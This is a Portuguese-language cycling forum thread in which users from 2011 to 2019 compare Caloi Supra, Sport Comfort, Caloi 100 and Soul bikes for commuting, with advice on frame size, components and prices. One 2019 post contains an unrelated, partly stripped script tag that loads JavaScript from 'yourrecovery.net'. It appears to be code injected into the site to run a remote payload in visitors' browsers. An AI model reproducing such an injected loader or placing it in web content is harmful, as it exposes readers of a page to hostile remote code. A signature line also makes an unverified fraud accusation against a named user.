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Casa x Trabalho - Caloi Supra?

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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Natividade Citar  ResponderResponder Link direto para este Post Tópico: Casa x Trabalho - Caloi Supra?
    Postado: 26 Jul 2011 as 05:33
Camaradas, saudações!
 
Estou tentando ingressar nesse mundo das pedaladas, totalmente novo pra mim nesse ponto de vista mais crítico, e antes de comprar qualquer coisa fui dar uma googlada como de praxe. Só posso dizer que passar por aqui acabou 100% com meus planos de adquirir uma bike qualquer nas últimas semanas. hahahahaha
 
O plano era ter comprado uma magrela há 2 semanas, mas quando comecei a ler sobre tudo isso por aqui, aí complicou. E complicou MESMO. Fico com pena de gastar uns 400 a 500, podendo gastar um pouco mais e ter um resultado mais satisfatório e com pouca dor de cabeça. Por fim, limitei-me a R$1000,00 máximo para investir, sendo que gostaria até se possível investir um pouco mesmo na compra, caso precise trocar algumas peças de imediato.
 
No vai e vem, fiquei entre a Caloi Aluminum + ups com o grupo shimano tourney de início, a troca dos aros e selim. Até porque como é uma bicicleta pra ir pro trabalho, não queria investir muito.
 
Mas...
 
Também senti que vou querer ir mais longe, quando chegar aquele domingo bonito e perfeito pra dar uma pedalada, então já fiquei mais preocupado, daí pensei na Supra. Queria algo que pudesse ir um pouco mais longe, e que não me gerasse muita preocupação em ficar a pé.
 
Eu moro em São Gonçalo , no Rio de Janeiro. Caso alguém conheça aqui, a referência de distância que gostaria de percorrer, seria daqui a Icaraí/Niterói. Ou, daqui até as barcas, das barcas até o Rio e do Centro até o Flamengo.
 
Mais um ponto pela Supra, é que eu tenho 1,88, logo o quadro mais ideal que pesquisei seria o de 21". Já a aluminum só tem 19", e fico com medo de ficar um brinquedinho quando eu montar.
 
 
Então peço por favor por opiniões, e se a Supra seria ideal e aguentaria de início com os componentes originais fazer esse trajeto e suprir essa necessidade minha.
 
 
Caso sim, também aceito sugestões de lugares que vendam aqui no Rio por valores mais em conta a vista, ou de usadas que estejam em boas condições.
 
 
 
Agradeço desde já! Big smile
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Natividade Ver Drop Down


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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Natividade Citar  ResponderResponder Link direto para este Post Postado: 26 Jul 2011 as 05:35
* gastar menos...
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poneis Ver Drop Down


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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar poneis Citar  ResponderResponder Link direto para este Post Postado: 26 Jul 2011 as 13:33
Só o preço de um conjunto tourney + aros, selim e a instalação vai dar o preço de uma bike melhor e olha que você nem mexeu nas manoplas de ralador de queijo ou nos freios de plástico ou na mesa, que vai estar muito curta para você.

O quadro é 21 mesmo? Me parece meio grande. Usou aquela "planilha bike fit"? Se não, só colocar os termos entre aspas no google.


Para uma bike para ir ao trabalho, o legal seria uma bike que aceitasse bagageiros sem gambiarras, assim você não vai ficar com as costas suadas, fora que você tem a oportunidade de fazer viagens com ela. A soul miracle e a sl100 têm essa opção e vem em tamanhos maiores.
Os melhores mecânicos para a sua bike: www.bike123.com.br
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Natividade Ver Drop Down


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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Natividade Citar  ResponderResponder Link direto para este Post Postado: 26 Jul 2011 as 16:09
Fala, meu querido!
 
Obrigado pela resposta.
 
 
Rapaz, ainda não fiz esse teste na "bike fit", mas irei fazer então. Eu tinha visto tamanho de quadro num site chamado "escola de bicicleta", onde mostra o tamanho do quadro para as respectivas alturas. Como eu sou grande, pernas longas, braços longos e também tenho um porte atlético, em cima de uma bike pouco robusta esteticamente fica um pouco engraçado.
 
Imaginei essas coisas sobre a Aluminum, mas queria opinião também de quem entendesse mais, até porque sou leigo até então em muita coisa de bike. Vou pesquisar a respeito dessas bicicletas que você mencionou, pois não conheço. Se estiver na faixa de preço, aí vale a pena dar uma analisada.
 
E a respeito da supra, dá pra rodar com os originais ou tenho que morrer em mais alguma coisa nela? Porque tava querendo comprar e no máximo trocar o selim de início. Já os pneus, não sei se daria pra colocar slick agora. Até porque o trajeto é um pouco híbrido: Apesar de ter bastante asfalto, terei de passar por algumas áreas com areia e pedras.
 
 
Valeu demais pela atenção!Big smile
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Xerxeis Ver Drop Down
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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Xerxeis Citar  ResponderResponder Link direto para este Post Postado: 26 Jul 2011 as 17:47

Concordo com a dica acima. Ainda não tive oportunidade de testar uma Soul Miracle, mas pela configuração e pelo preço tenho recomendado aos meus amigos que estão querendo entrar no mundo das bikes.

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poneis Ver Drop Down


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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar poneis Citar  ResponderResponder Link direto para este Post Postado: 26 Jul 2011 as 19:05
Você vai precisar trocar o movimento central da supra. As bikes sub R$1000 da caloi costumam vir com centrais descartáveis. Fora isso, trocar os pneus é uma boa, pois os que vêm nela são bem fuleiros, aguentam pouca pressão e deixam a bike bem lenta.
Os melhores mecânicos para a sua bike: www.bike123.com.br
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leogodoy Ver Drop Down
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Hoje eu pegaria uma Soul Miracle ou mesmo uma Copenhague. Tenho uma Supra, só sobrou a cx de direção e o proprio quadro de original, hehe. O movimento central é uma piada, mas o resto vale ir moendo e depois você troca.

Abs
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beesooz Ver Drop Down
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Tem uma bike por 600,00 com quadro da Supra e várias peças show, com guidão de uma estilo rider. Só que eu tenho 1.61, meu cavalo mede 77cm e o quadro é tam. 19. Eu andei nela, e dá pra andar de boa, mas toda vez que eu parar, tenho que descer do selim. Será que isso pode comprometer minha segurança ou eu acabo acostumando com ela? Será que pra pegar trânsito, semáforos e ter que parar constantemente isso pode se tornar um incoveniente???
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xandaumgv Ver Drop Down
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sao paulo
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Originalmente postado por beesooz beesooz escreveu:

Tem uma bike por 600,00 com quadro da Supra e várias peças show, com guidão de uma estilo rider. Só que eu tenho 1.61, meu cavalo mede 77cm e o quadro é tam. 19. Eu andei nela, e dá pra andar de boa, mas toda vez que eu parar, tenho que descer do selim. Será que isso pode comprometer minha segurança ou eu acabo acostumando com ela? Será que pra pegar trânsito, semáforos e ter que parar constantemente isso pode se tornar um incoveniente???

suas preocupações já responderam aos seus questionamentos ... sim ... adicionando dores nas costas ... e talvez problemas nos joelhos ...é um preço consideralvel, mas EU não pagaria para ver ...

Abraços
Alexandre

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FLIMA Ver Drop Down
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Floripa
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Natividade,

Vai de soul como a galera falou. A minha commuting tá com quadro da aluminum da caloi e ele já é pequeno pra mim que tenho 1,81m com 86,4 de cavalo. Imagina pra alguém de 1,88m.

Originalmente postado por beesooz beesooz escreveu:

Eu andei nela, e dá pra andar de boa, mas toda vez que eu parar, tenho que descer do selim. Será que isso pode comprometer minha segurança ou eu acabo acostumando com ela? Será que pra pegar trânsito, semáforos e ter que parar constantemente isso pode se tornar um incoveniente???

Tem que separar as coisas.
1) quadro 19'' pra quem tem 1,61m é sim, pequeno. Isso é uma coisa, outra coisa é a parar descendo do selim. 
2) descer do selim ao parar a bike além de normal, é o jeito indicado pra quem já nao está mais aprendendo a pedalar. Se o selim ficar a uma altura que vc consiga colocar o pé no chão, mesmo sentado nele, o seu selim está muito baixo. Isso lhe trará dores nos joelhos em breve, e uma lesão mais forte, caso continue assim.

Não negociem nada com usuário JMarcelo (José Marcelo Pan y Agua). Fui roubado em R$ 800,00 por esse pilantra.

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beesooz Ver Drop Down
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Gente, obrigada pelas dicas, eu ainda tou procurando minha bike. Pensando entre a Caloi Easy Rider e a Caloi 700 Feminina. O quadro 19'' pra mim é GRANDE. Estou estranhando vocês dizendo que é um quadro pequeno. O meu tamanho de quadro, de acordo com 3 "testes de fit" é 17. Fiquei mt insegura sobre levar meu filho numa bike grande demais pra mim. Ao descer do selim, meu pipiu encosta mesmo no quadro. Se eu frear bruscamente e tiver que parar a bike com 2 pernas, vou ter um hematoma entre elas. 


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xandaumgv Ver Drop Down
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sao paulo
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Nao disse que tamanho 19 era pequeno, e o que o outro forista disse talvez soou esttanho, pequeno seja vc em relação ao tamanho do quadro ... realmente subir e descer da bike é comum, se um quadro for muito maior dificulta na hora de subir ... carregando uma criança aumenta a dificuldade ..

Abraços
Alexandre

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Floripa
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Isso.. quadro 19 é grande pra quem tem 1,60m.. e não pequeno como eu disse antes. Vi agora que troquei as bolas na hora de digitar, desculpe
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beesooz Ver Drop Down
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Pois é. Essa tarde comecei a me questionar sobre a possível versatilidade da Caloi 700. Vocês acham que (o uso majoritário é urbano, claro) dá pra colocar um amortecedor melhor, trocar a pedivela e outras peças e utilizar essa mesma bike pra fazer umas trilhas leves, tipo, só passeio por mata, etc? PS: eu já fiz trilha com uma bike passeio de ferro, sem nem amortecedor nem marcha. :P
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Originalmente postado por beesooz beesooz escreveu:

Pois é. Essa tarde comecei a me questionar sobre a possível versatilidade da Caloi 700. Vocês acham que (o uso majoritário é urbano, claro) dá pra colocar um amortecedor melhor, trocar a pedivela e outras peças e utilizar essa mesma bike pra fazer umas trilhas leves, tipo, só passeio por mata, etc? PS: eu já fiz trilha com uma bike passeio de ferro, sem nem amortecedor nem marcha. :P

Bom ... amortecedor melhor não recomendaria ... o uso dessa bici é mais para asfalto e alguns parques e afins ... se a trilha for realmente leve o amortecedor que vem deve satisfazer ... os pneus nao sao para esse fim ... a relação de marchas pode mudar sim ...

Bike de ferro nao quer dizer muito ... se for de qualidade pode ser muito mais resistente que essa 700 ...

Abraçs
Alexandre

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beesooz Ver Drop Down
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O modelo Caloi Sport Comfort ( http://caloi.com.br/bikes/scomfort - http://caloi.com.br/bikes/sportcomfort) vem com a descrição "Mobilidade". Tem amortecedor no canote. Vi usuários alegando que é mt confortável no asfalto. O guidão dela é regulável, ou seja, pode até ficar mais alto e próximo, mais perto da posição que ficaríamos em uma Caloi 700. O preço dela é 60 reais a menos que a 700. Será que é uma boa pedida pra quem quer uma bike versátil? Meu uso, digamos, seria 70% cidade e 20% passeios de bike em grupo por matas, terrenos de areia, etc. No caso, eu acredito que a Caloi 700 não vai poder me dar esses 20% de uso e vai limitar os meus trajetos... 
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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar xandaumgv Citar  ResponderResponder Link direto para este Post Postado: 27 Mai 2013 as 21:41
Originalmente postado por beesooz beesooz escreveu:

O modelo Caloi Sport Comfort ( http://caloi.com.br/bikes/scomfort - http://caloi.com.br/bikes/sportcomfort) vem com a descrição "Mobilidade". Tem amortecedor no canote. Vi usuários alegando que é mt confortável no asfalto. O guidão dela é regulável, ou seja, pode até ficar mais alto e próximo, mais perto da posição que ficaríamos em uma Caloi 700. O preço dela é 60 reais a menos que a 700. Será que é uma boa pedida pra quem quer uma bike versátil? Meu uso, digamos, seria 70% cidade e 20% passeios de bike em grupo por matas, terrenos de areia, etc. No caso, eu acredito que a Caloi 700 não vai poder me dar esses 20% de uso e vai limitar os meus trajetos... 

hoje esta em um bom preço ... pq nao vai atras dessa? parece muito mais compativel com o que vc quer ...


e é uma otima marca ... tamanho p....

veja se acha algum desconto para utiliza-la...

Abraços
Alexandre

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beesooz Ver Drop Down
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hoje esta em um bom preço ... pq nao vai atras dessa? parece muito mais compativel com o que vc quer ...

http://www.centauro.com.br/bicicleta-gt-laguna-2013-w.?cor=01&feature=similaritems&source=product - http://www.centauro.com.br/bicicleta-gt-laguna-2013-w.html?cor=01&feature=similaritems&source=product

e é uma otima marca ... tamanho p....

veja se acha algum desconto para utiliza-la...

Abraços
[/QUOTE]

Amigo, sinceramente não tenho essa grana toda. A Sport Comfort custa 999, mas tá por 799 só hoje, e consegui descontos, ficou por R$ 616,00, ou seja: de 999 por 616. Já comprei, kkk
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xandaumgv Ver Drop Down
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Originalmente postado por beesooz beesooz escreveu:

hoje esta em um bom preço ... pq nao vai atras dessa? parece muito mais compativel com o que vc quer ...

http://www.centauro.com.br/bicicleta-gt-laguna-2013-w.?cor=01&feature=similaritems&source=product - http://www.centauro.com.br/bicicleta-gt-laguna-2013-w.html?cor=01&feature=similaritems&source=product

e é uma otima marca ... tamanho p....

veja se acha algum desconto para utiliza-la...

Abraços

Amigo, sinceramente não tenho essa grana toda. A Sport Comfort custa 999, mas tá por 799 só hoje, e consegui descontos, ficou por R$ 616,00, ou seja: de 999 por 616. Já comprei, kkk
[/QUOTE]

Bom se ja comprou ... aproveite-a ... espero que não fique grande ... verdade seja dita ... é dificil demais comprar bicicleta para mulheres ... kk

Bons pedais.
Alexandre

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O problema de "versatilidade" das bikes que são pra uso em asfalto, sendo usadas em trilhas, é que as peças não aguentam o tranco.. sempre alguma coisa ou outra vai quebrar ou demandar troca de peça. Já fiz muito isso e já gastei muito $$ também por causa disso. Mas o pior de tudo é quebrar algo importante no meio da trilha e vc além de ficar a pé, ter uma possível queda/lesão/fratura.. isso sim é um prejuízo real.

É melhor pegar uma bike específica pra trilha, o gasto é menor... ou usar a de trilha pro asfalto, e não o contrário.
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beesooz Ver Drop Down
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Comprei a Caloi Sport Comfort 2013. Ela saiu a 614, mas o preço é 999 mesmo. Vi vários rewiews sobre ela, dizendo a turma que é bem confortável pro asfalto e tem bons componentes. Vou instalar uma cadeirinha pra criança no eixo traseiro dela, específica pra bike sem bagageiros. Talvez melhore os pneus. Depois tiro foto. Bjos e OBRIGADA, pois esses tópicos realmente influenciaram minha decisão. PS: o quadro da Sport Comfort é 17'' e dá perfeito pra mim. 
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amsantosrj Ver Drop Down


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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar amsantosrj Citar  ResponderResponder Link direto para este Post Postado: 20 Out 2014 as 13:57
Amigos vcs acham que a Comfort é uma boa bicicleta para ir ao trabalho, faculdade, academia e uns passeios light na ciclovia. 

A distãncia de cada trajeto nao chego a 20 Km(ida e volta)
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NicolasRJ Ver Drop Down
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Boa tarde amigo só para te ajudar eu tenho a Supra 2014 eu utilizo ela todo dia para ir para meu curso,passear no fim de semana,colégio e etc rodo em média de 10 km por dia ela é confortável e atende minha necessidade pode servir para você também mas enfim a confort é uma boa bike também o bom dela na minha opinião é a regulagem do guidão mas dê uma olhada na Supra também.
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amsantosrj Ver Drop Down


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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar amsantosrj Citar  ResponderResponder Link direto para este Post Postado: 21 Out 2014 as 09:21
NicolaRj muito obrigado. Na sua opinião o que ela difere da Comfort

Na verdade me indicaram essas bikes:


Soul Black rain ou Sul SL 70
Comfort
Easy Rider
Supra

Qual é a sua supra?
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kakoniteroi Ver Drop Down
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Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar kakoniteroi Citar  ResponderResponder Link direto para este Post Postado: 21 Out 2014 as 12:05
Meu camarada , nem pense em uma 19.
Eu tenho 1,85m tenho uma 19 e está no gogó da ema.
Penso até em trocar a mesa por uma maior....
Canote fica no máximo para o alto.

Melhor procurar uma 21
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amsantosrj Ver Drop Down


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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar amsantosrj Citar  ResponderResponder Link direto para este Post Postado: 21 Out 2014 as 15:07
Me indicaram tb uma tito urban

Tenho 1,80 e nao fiz bike fit ainda
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jbtozetti Ver Drop Down
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Originalmente postado por amsantosrj amsantosrj escreveu:

Me indicaram tb uma tito urban

Tenho 1,80 e nao fiz bike fit ainda

descarte a Caloi Confort, é cara demais pelos componentes oferecidos

a Black Rain, a SL70 e a Supra estão em pé de igualdade porém são bikes beeem diferentes q a Tito Urban, sugiro q vc  faça o bikefit, monte nelas e dê uma pedalada pra sentir a diferença
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amsantosrj Ver Drop Down


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É por ai. Pelo que percebi a Black Rain, SL seriam mountain bike que podemos usar no dia dia? Ja a Tito seria uma bike essencialmente urbana certo? O que pode diferenciar é desempenho e/ou comforto? Infelizmente acho dificil achar em loja fisica a TITO. Vou testar as da Soul
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NicolasRJ Ver Drop Down
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Amsantosrj a minha é a Supra 10 V-Brake e coloquei frio a disco somente na frente ficou muito bom tenho ela a 5 meses troquei minha HTX por ela.Eu acho que a unica coisa que difere é o estilo do quadro,regulagem do guidão e o selim que é confortável .
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aianabenet Ver Drop Down
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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 22 Dez 2019 as 23:40
Reativando o post aqui,< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">
to em dúvida de 2 bikes que encontrei no mesmo valor na olx.

Uma caloi 100 toda shimano tourney, do jeito que saiu da loja, com pouco tempo de uso.
e uma Caloi Supra, shimano altus, que foi trocada de V-brake pra freio a disco.

As duas grandes questões: a caloi 100, é bem perto da minha casa. Eu sou ciclista iniciante, pedalar muito distante seria complicado, que é o caso da Supra, que pra ir buscar ia dar esse trabalhão. E a outra questão é que os pneus da supra estão desgastados, então, não sei em quanto tempo, mas logo, eu teria que colocar dois novos pneus.

Levando em consideração que as duas tem o mesmo valor e que meu percurso é de uns 15km diários, 75% em ciclovia, sem ladeiras e no asfalto, eu deveria fazer uma força pela supra?

Se puderem ajudar aí, agradeço muitao!
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dwsmartins Ver Drop Down
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Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar dwsmartins Citar  ResponderResponder Link direto para este Post Postado: 23 Dez 2019 as 00:17
Eu havia respondido no seu tópico anterior, provavelmente a Supra é do anúncio que não abriu.

O quadro da Supra me inspira mais qualidades que o da Caloi 100. Os componentes tb são melhores. Não teria como colocar a Supra em um ônibus, talvez em um final de semana? Não vi como ela está, mas em geral é uma bike mais completa. Os componentes Tourney tem uma vida mais curta tb, o que pode pesar na escolha de uma bike de mobilidade devido à menor manutenção.
Bora pedalar, senão estressa!
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aianabenet Ver Drop Down
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Cadastrado em: 06 Dez 2019
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Originalmente postado por dwsmartins dwsmartins escreveu:

Eu havia respondido no seu tópico anterior, provavelmente a Supra é do anúncio que não abriu.

O quadro da Supra me inspira mais qualidades que o da Caloi 100. Os componentes tb são melhores. Não teria como colocar a Supra em um ônibus, talvez em um final de semana? Não vi como ela está, mas em geral é uma bike mais completa. Os componentes Tourney tem uma vida mais curta tb, o que pode pesar na escolha de uma bike de mobilidade devido à menor manutenção.


Concordo muito sobre o quadro da supra. Só que ele me falou que não é Altus, e sim tourney tb. Aí já ficou praticamente elas por elas; Fora que um amigo aqui do forum me alertou sobre essa troca dos freios originais v-brake pra freio à disco pode gerar problemas lá na frente e a manutenção ficar muito mais cara. Então eu to quase certa da comfort 100.
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